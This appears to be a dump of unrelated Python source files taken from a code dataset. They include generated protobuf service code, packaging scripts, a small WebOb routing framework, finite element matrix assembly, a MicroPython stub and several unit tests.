PauseModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('PauseModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _PAUSEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse)
})
_sym_db.RegisterMessage(PauseModelPipelineRunResponse)
PauseModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('PauseModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _PAUSEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest)
})
_sym_db.RegisterMessage(PauseModelPipelineRunRequest)
ResumeModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ResumeModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _RESUMEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ResumeModelPipelineRunResponse)
ResumeModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('ResumeModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _RESUMEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest)
})
_sym_db.RegisterMessage(ResumeModelPipelineRunRequest)
AbortModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('AbortModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _ABORTMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse)
})
_sym_db.RegisterMessage(AbortModelPipelineRunResponse)
AbortModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('AbortModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _ABORTMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest)
})
_sym_db.RegisterMessage(AbortModelPipelineRunRequest)
DESCRIPTOR._options = None
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY._options = None
_MODELPIPELINERUNSERVICE = _descriptor.ServiceDescriptor(
name='ModelPipelineRunService',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1794,
serialized_end=4461,
methods=[
_descriptor.MethodDescriptor(
name='ListModelPipelineRuns',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ListModelPipelineRuns',
index=0,
containing_service=None,
input_type=_LISTMODELPIPELINERUNSREQUEST,
output_type=_LISTMODELPIPELINERUNSRESPONSE,
serialized_options=b'\202\323\344\223\002!\022\037/api/v1alpha1/modelpipelineruns',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='CreateModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.CreateModelPipelineRun',
index=1,
containing_service=None,
input_type=_CREATEMODELPIPELINERUNREQUEST,
output_type=_CREATEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\037/api/v1alpha1/modelpipelineruns:\001*',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.GetModelPipelineRun',
index=2,
containing_service=None,
input_type=_GETMODELPIPELINERUNREQUEST,
output_type=_GETMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002(\022&/api/v1alpha1/modelpipelineruns/{name}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='UpdateModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.UpdateModelPipelineRun',
index=3,
containing_service=None,
input_type=_UPDATEMODELPIPELINERUNREQUEST,
output_type=_UPDATEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002E\032@/api/v1alpha1/modelpipelineruns/{modelpipelinerun.metadata.name}:\001*',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DeleteModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.DeleteModelPipelineRun',
index=4,
containing_service=None,
input_type=_DELETEMODELPIPELINERUNREQUEST,
output_type=_DELETEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002<*:/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ApproveModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ApproveModelPipelineRun',
index=5,
containing_service=None,
input_type=_APPROVEMODELPIPELINERUNREQUEST,
output_type=_APPROVEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002D*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenyModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.DenyModelPipelineRun',
index=6,
containing_service=None,
input_type=_DENYMODELPIPELINERUNREQUEST,
output_type=_DENYMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002D*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='AbortModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.AbortModelPipelineRun',
index=7,
containing_service=None,
input_type=_ABORTMODELPIPELINERUNREQUEST,
output_type=_ABORTMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\"/v1/modelpipelineruns/{name}:abort',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='PauseModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.PauseModelPipelineRun',
index=8,
containing_service=None,
input_type=_PAUSEMODELPIPELINERUNREQUEST,
output_type=_PAUSEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\"/v1/modelpipelineruns/{name}:pause',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ResumeModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ResumeModelPipelineRun',
index=9,
containing_service=None,
input_type=_RESUMEMODELPIPELINERUNREQUEST,
output_type=_RESUMEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002%\"#/v1/modelpipelineruns/{name}:resume',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_MODELPIPELINERUNSERVICE)
DESCRIPTOR.services_by_name['ModelPipelineRunService'] = _MODELPIPELINERUNSERVICE
# @@protoc_insertion_point(module_scope)
| nilq/baby-python | python |
import os.path
import re
from setuptools import setup
(__version__, ) = re.findall("__version__.*\s*=\s*[']([^']+)[']",
open('toms/__init__.py').read())
HERE = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(HERE, "README.md")) as fid:
README = fid.read()
setup(
name="toms",
version=__version__,
description="Convert date to milliseconds and back",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/d10xa/toms",
author="d10xa",
author_email="d10xa@mail.ru",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
packages=["toms"],
include_package_data=True,
install_requires=[
"python-dateutil>=2.7.1"
],
entry_points={"console_scripts": ["toms=toms.__main__:main"]},
)
| nilq/baby-python | python |
from dataclasses import dataclass, field
from typing import List
__NAMESPACE__ = "NISTSchema-SV-IV-list-time-pattern-3-NS"
@dataclass
class NistschemaSvIvListTimePattern3:
class Meta:
name = "NISTSchema-SV-IV-list-time-pattern-3"
namespace = "NISTSchema-SV-IV-list-time-pattern-3-NS"
value: List[str] = field(
default_factory=list,
metadata={
"pattern": r"\d4:4\d:\d8 \d4:2\d:2\d 0\d:4\d:3\d \d3:\d4:1\d 1\d:\d8:5\d \d2:\d3:4\d \d3:0\d:\d6 \d6:4\d:\d6 \d8:\d2:2\d",
"tokens": True,
}
)
| nilq/baby-python | python |
from enum import Enum
class Colors(Enum):
GREEN = "#00C2A4"
PINK = "#FD5383"
PURPLE = "#8784FF"
BLUE_1 = "#1B2A4D"
BLUE_2 = "#384B74"
BLUE_3 = "#8699B7"
class ColorPalettes(Enum):
CATEGORY = [
Colors.BLUE_1.value,
Colors.GREEN.value,
Colors.PURPLE.value,
Colors.PINK.value,
Colors.BLUE_3.value,
]
DIVERGING = [
Colors.GREEN.value,
"#7AD3BD",
"#B8E2D6",
"#F1F1F1",
"#FCC1CB",
"#FF8FA6",
Colors.PINK.value,
]
HEATMAP = [
Colors.BLUE_2.value,
"#56678E",
"#7584A9",
"#94A2C5",
"#B5C2E2",
"#D6E2FF",
]
ORDINAL = [
Colors.BLUE_1.value,
"#273969",
"#354886",
"#4657A3",
"#5966C2",
"#6f75E0",
Colors.PURPLE.value,
]
| nilq/baby-python | python |
from .test_controller import JsonController, JsonArrayController, TemplateController
| nilq/baby-python | python |
"""
This file is a meant to make custom frame work like set up.
It will enable us to have a enpoints/routes for our API without
using a framework like flask or Django.
We will use WebOb to create a request and response object which
is centered around the WSGI model.
For more info https://docs.pylonsproject.org/projects/webob/en/stable/do-it-yourself.html
"""
import os, inspect
import sys
import re
from webob import Request, exc, Response
import tempita
"""
Here we create the regular expression(var_regex).
The re.VERBOSE flag makes the regular expression
parser ignore whitespace and allow comments.
"""
var_regex = re.compile(r'''
\{ # The exact character "{"
(\w+) # The variable name (restricted to a-z, 0-9, _)
(?::([^}]+))? # The optional :regex part
\} # The exact character "}"
''', re.VERBOSE)
def template_to_regex(template):
""" Function to compile templates to regular expressions."""
# This variable will hold the regular expression that we are creating.
regex = ''
# This contains the position of the end of the last match.
last_pos = 0
for match in var_regex.finditer(template): # The finditer method yields all the matches.
# On the next line, We're getting all the non-{} text from after the last match,
# up to the beginning of this match.
# We call re.escape on that text, which escapes any characters that have special meaning.
# So .html will be escaped as \.html.
regex += re.escape(template[last_pos:match.start()])
var_name = match.group(1) # The first match is the variable name.
# expr is the regular expression we'll match against, the optional second match.
# The default is [^/]+, which matches any non-empty, non-/ string.
expr = match.group(2) or '[^/]+'
expr = '(?P<%s>%s)' % (var_name, expr)
regex += expr
last_pos = match.end()
regex += re.escape(template[last_pos:])
regex = '^%s$' % regex
return regex
def load_controller(string):
module_name, func_name = string.split(':', 1)
__import__(module_name)
module = sys.modules[module_name]
func = getattr(module, func_name)
return func
class Router:
def __init__(self):
self.routes = []
def add_route(self, template, controller, **vars):
if isinstance(controller, str):
controller = load_controller(controller)
self.routes.append((re.compile(template_to_regex(template)),controller,vars))
def __call__(self, environ, start_response):
"""
This method makes the Router object itself a WSGI application.
"""
req = Request(environ)
for regex, controller, vars in self.routes:
match = regex.match(req.path_info)
if match:
req.urlvars = match.groupdict()
req.urlvars.update(vars)
return controller(environ, start_response)
return exc.HTTPNotFound('No route matched')(environ, start_response)
def rest_controller(cls):
def replacement(environ, start_response):
req = Request(environ)
try:
instance = cls(req, **req.urlvars)
action = req.urlvars.get('action')
if action:
action += '_' + req.method.lower()
else:
action = req.method.lower()
try:
method = getattr(instance, action)
except AttributeError:
raise exc.HTTPNotFound("No action %s" % action)
resp = method()
if isinstance(resp, str):
resp = Response(body=resp)
except exc.HTTPException as e:
resp = e
return resp(environ, start_response)
return replacement
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 4 18:14:29 2016
@author: becker
"""
import numpy as np
import numpy.linalg as linalg
from simfempy import fems
from simfempy.meshes.simplexmesh import SimplexMesh
import scipy.sparse as sparse
#=================================================================#
class Fem(object):
def __repr__(self):
repr = f"{self.__class__.__name__}"
return repr
def __init__(self, **kwargs):
mesh = kwargs.get('mesh', None)
if mesh is not None: self.setMesh(mesh)
def setMesh(self, mesh, innersides=False):
self.mesh = mesh
self.nloc = self.nlocal()
if innersides: self.mesh.constructInnerFaces()
def computeStencilCell(self, dofspercell):
self.cols = np.tile(dofspercell, self.nloc).ravel()
self.rows = np.repeat(dofspercell, self.nloc).ravel()
#Alternative
# self.rows = dofspercell.repeat(self.nloc).reshape(self.mesh.ncells, self.nloc, self.nloc)
# self.cols = self.rows.swapaxes(1, 2)
# self.cols = self.cols.reshape(-1)
# self.rows = self.rows.reshape(-1)
# def computeStencilInnerSidesCell(self, dofspercell):
# nloc, faces, cellsOfFaces = self.nloc, self.mesh.faces, self.mesh.cellsOfFaces
# # print(f"{faces=}")
# # print(f"{cellsOfFaces=}")
# innerfaces = cellsOfFaces[:,1]>=0
# cellsOfInteriorFaces= cellsOfFaces[innerfaces]
# self.cellsOfInteriorFaces = cellsOfInteriorFaces
# self.innerfaces = innerfaces
# return
# # print(f"{innerfaces=}")
# print(f"{cellsOfInteriorFaces=}")
# raise NotImplementedError(f"no")
# ncells, nloc = dofspercell.shape[0], dofspercell.shape[1]
# print(f"{ncells=} {nloc=}")
# print(f"{dofspercell[cellsOfInteriorFaces,:].shape=}")
# rows = dofspercell[cellsOfInteriorFaces,:].repeat(nloc)
# cols = np.tile(dofspercell[cellsOfInteriorFaces,:],nloc)
# print(f"{rows=}")
# print(f"{cols=}")
def interpolateCell(self, f):
if isinstance(f, dict):
b = np.zeros(self.mesh.ncells)
for label, fct in f.items():
if fct is None: continue
cells = self.mesh.cellsoflabel[label]
xc, yc, zc = self.mesh.pointsc[cells].T
b[cells] = fct(xc, yc, zc)
return b
else:
xc, yc, zc = self.mesh.pointsc.T
return f(xc, yc, zc)
def computeMatrixDiffusion(self, coeff):
ndofs = self.nunknowns()
# matxx = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 0], self.cellgrads[:, :, 0])
# matyy = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 1], self.cellgrads[:, :, 1])
# matzz = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 2], self.cellgrads[:, :, 2])
# mat = ( (matxx+matyy+matzz).T*self.mesh.dV*coeff).T.ravel()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
mat = np.einsum('n,nil,njl->nij', self.mesh.dV*coeff, cellgrads, cellgrads).ravel()
return sparse.coo_matrix((mat, (self.rows, self.cols)), shape=(ndofs, ndofs)).tocsr()
def computeFormDiffusion(self, du, u, coeff):
doc = self.dofspercell()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
r = np.einsum('n,nil,njl,nj->ni', self.mesh.dV*coeff, cellgrads, cellgrads, u[doc])
np.add.at(du, doc, r)
def computeMatrixLps(self, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
# betan = 0.5*(np.linalg.norm(betaC[ci0],axis=1)+ np.linalg.norm(betaC[ci1],axis=1))
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
mat00 = np.einsum('nki,nli,n->nkl', cg0, cg0, scale)
mat01 = np.einsum('nki,nli,n->nkl', cg0, cg1, -scale)
mat10 = np.einsum('nki,nli,n->nkl', cg1, cg0, -scale)
mat11 = np.einsum('nki,nli,n->nkl', cg1, cg1, scale)
rows0 = dofspercell[ci0,:].repeat(nloc)
cols0 = np.tile(dofspercell[ci0,:],nloc).reshape(-1)
rows1 = dofspercell[ci1,:].repeat(nloc)
cols1 = np.tile(dofspercell[ci1,:],nloc).reshape(-1)
A00 = sparse.coo_matrix((mat00.reshape(-1), (rows0, cols0)), shape=(ndofs, ndofs))
A01 = sparse.coo_matrix((mat01.reshape(-1), (rows0, cols1)), shape=(ndofs, ndofs))
A10 = sparse.coo_matrix((mat10.reshape(-1), (rows1, cols0)), shape=(ndofs, ndofs))
A11 = sparse.coo_matrix((mat11.reshape(-1), (rows1, cols1)), shape=(ndofs, ndofs))
return A00+A01+A10+A11
def computeFormLps(self, du, u, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
r = np.einsum('nki,nli,n,nl->nk', cg0, cg0, scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci0,:], r)
# mat01 = np.einsum('nki,nli,n,nl->nk', cg0, cg1, -scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci0,:], mat01)
r = np.einsum('nki,nli,n,nl->nk', cg1, cg0, -scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci1,:], r)
# mat11 = np.einsum('nki,nli,n,nl->nk', cg1, cg1, scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci1,:], mat11)
def computeFormConvection(self, du, u, data, method, **kwargs):
if method[:4] == 'supg':
self.computeFormTransportSupg(du, u, data, method)
elif method == 'upwalg':
self.computeFormTransportUpwindAlg(du, u, data)
elif method[:3] == 'upw':
self.computeFormTransportUpwind(du, u, data, method)
elif method == 'lps':
self.computeFormTransportLps(du, u, data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
def computeMatrixConvection(self, data, method, **kwargs):
if method[:4] == 'supg':
return self.computeMatrixTransportSupg(data, method)
elif method == 'upwalg':
return self.computeMatrixTransportUpwindAlg(data)
elif method[:3] == 'upw':
return self.computeMatrixTransportUpwind(data, method)
elif method == 'lps':
return self.computeMatrixTransportLps(data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
# ------------------------------------- #
if __name__ == '__main__':
trimesh = SimplexMesh(geomname="backwardfacingstep", hmean=0.3)
| nilq/baby-python | python |
"""
Module: 'uzlib' on esp8266 v1.9.3
"""
# MCU: (sysname='esp8266', nodename='esp8266', release='2.0.0(5a875ba)', version='v1.9.3-8-g63826ac5c on 2017-11-01', machine='ESP module with ESP8266')
# Stubber: 1.1.2 - updated
from typing import Any
class DecompIO:
""""""
def read(self, *argv) -> Any:
pass
def readinto(self, *argv) -> Any:
pass
def readline(self, *argv) -> Any:
pass
def decompress():
pass
| nilq/baby-python | python |
import sys
from random import randint
import pytest
from src.app.main.model_centric.cycles.worker_cycle import WorkerCycle
from src.app.main.model_centric.processes.fl_process import FLProcess
from . import BIG_INT
from .presets.fl_process import (
AVG_PLANS,
CLIENT_CONFIGS,
CYCLES,
MODELS,
PROTOCOLS,
SERVER_CONFIGS,
TRAINING_PLANS,
VALIDATION_PLANS,
)
from .presets.worker_cycle import WORKERS
sys.path.append(".")
@pytest.mark.parametrize(
"""model,
avg_plan,
train_plan,
valid_plan,
protocol,
client_config,
server_config,
cycle,
worker""",
list(
zip(
MODELS,
AVG_PLANS,
TRAINING_PLANS,
VALIDATION_PLANS,
PROTOCOLS,
CLIENT_CONFIGS,
SERVER_CONFIGS,
CYCLES,
WORKERS,
)
),
)
def test_create_worker_cycles_objects(
model,
avg_plan,
train_plan,
valid_plan,
protocol,
client_config,
server_config,
cycle,
worker,
database,
):
new_fl_process = FLProcess(id=randint(0, BIG_INT))
database.session.add(new_fl_process)
model.flprocess = new_fl_process
database.session.add(model)
avg_plan.avg_flprocess = new_fl_process
database.session.add(avg_plan)
train_plan.plan_flprocess = new_fl_process
database.session.add(train_plan)
valid_plan.plan_flprocess = new_fl_process
database.session.add(valid_plan)
protocol.protocol_flprocess = new_fl_process
database.session.add(protocol)
client_config.client_flprocess_config = new_fl_process
database.session.add(client_config)
server_config.server_flprocess_config = new_fl_process
database.session.add(server_config)
cycle.cycle_flprocess = new_fl_process
database.session.add(cycle)
worker_cycle = WorkerCycle(
id=randint(0, BIG_INT),
request_key="long_hashcode_here",
worker=worker,
cycle=cycle,
)
database.session.add(worker_cycle)
database.session.commit()
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2018 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
"""unit tests for geonode.upload.files module"""
from geonode.tests.base import GeoNodeBaseTestSupport
from geonode.upload import files
class FilesTestCase(GeoNodeBaseTestSupport):
def test_scan_hint_kml_ground_overlay(self):
result = files.get_scan_hint(["kml", "other"])
kml_file_type = files.get_type("KML Ground Overlay")
self.assertEqual(result, kml_file_type.code)
def test_scan_hint_kmz_ground_overlay(self):
result = files.get_scan_hint(["kmz", "other"])
self.assertEqual(result, "kmz")
def test_get_type_non_existing_type(self):
self.assertIsNone(files.get_type("fake"))
def test_get_type_kml_ground_overlay(self):
file_type = files.get_type("KML Ground Overlay")
self.assertEqual(file_type.code, "kml-overlay")
self.assertIn("kmz", file_type.aliases)
| nilq/baby-python | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.